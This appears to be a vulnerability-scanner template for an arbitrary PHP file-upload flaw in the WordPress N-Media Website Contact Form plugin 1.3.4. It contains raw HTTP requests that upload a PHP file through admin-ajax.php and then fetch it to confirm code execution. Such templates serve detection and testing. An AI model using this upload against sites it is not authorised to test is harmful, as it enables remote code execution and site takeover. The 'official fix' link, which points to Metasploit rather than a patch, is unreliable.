id: CNVD-2015-02771
info:
  name: Wordpress N-Media Website Contact Form with File Upload 1.3.4
  author:
  - l0ne1y
  description: |-
    WordPress Plugin N-Media Website Contact Form 1.3.4 file upload vulnerability
    WordPress is a blog platform developed by the WordPress Software Foundation using the PHP language. The platform supports the establishment of personal blog websites on PHP and MySQL servers.

    There is a file upload vulnerability in WordPress N-Media Website Contact Form. Allows an attacker to exploit the vulnerability to perform arbitrary file uploads and remote code execution.
  severity: critical
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://github.com/rapid7/metasploit-framework

    Temporary fix:
    File upload:
    1. The server side directly sets the file upload directory to non-executable.
    2. File type check: It is recommended to use the whitelist method (more reliable than the blacklist), combined with MIME Type, suffix check and other methods (the file type is restricted by the whitelist). In addition, you can use the compression function or resize function to process images, which will destroy the HTML code they contain while processing the image.
    3. Use random numbers to rewrite file names and file paths so that users cannot easily access their uploaded files.
    4. Set the domain name of the file server separately.
    5. Verify the file content and use regular rules to match malicious code (filter various bypass methods of malicious code, such as upper and lower case, BASE64 encoding) to limit uploading.
    6. Fix possible parsing vulnerabilities in the server.
    7. Strictly restrict the upload of files that can modify the server configuration, such as: .htaccess.
    8. Hide the upload file path.
    9. Upgrade Web Server.
    10. Fix the Web upload code in a timely manner.
    11. There cannot be any local files containing vulnerabilities.
    12. Pay attention to 0x00 truncation attack (update PHP to the latest version).
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code_1==200
    - status_code_2==200
    - contains(body_2,'{{varRand}}')
  extractors:
  - name: uploadFile
    type: regex
    regex:
    - ([\d]+)(\-)({{fileName}}.php)
    group: 1
    part: body
    internal: true
  raw:
  - |
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: {{Hostname}}
    Content-Type: multipart/form-data; boundary=-----------------------------WebKitFormBoundaryoWXEZaqFafD1oOAq

    -----------------------------WebKitFormBoundaryoWXEZaqFafD1oOAq
    Content-Disposition: form-data; name="Filedata"; filename="{{fileName}}.php"
    application/octet-stream

    <?php echo "{{varRand}}";?>
    -----------------------------WebKitFormBoundaryoWXEZaqFafD1oOAq
    Content-Disposition: form-data; name="action"

    nm_webcontact_upload_file
    -----------------------------WebKitFormBoundaryoWXEZaqFafD1oOAq--
  - |
    GET /wp-content/uploads/contact_files/{{uploadFile}} HTTP/1.1
    Host: {{Hostname}}
  req-condition: true
variables:
  fileName: '{{rand_text_alphanumeric(6,"")}}'
  varRand: '{{rand_text_alphanumeric(32,"")}}'
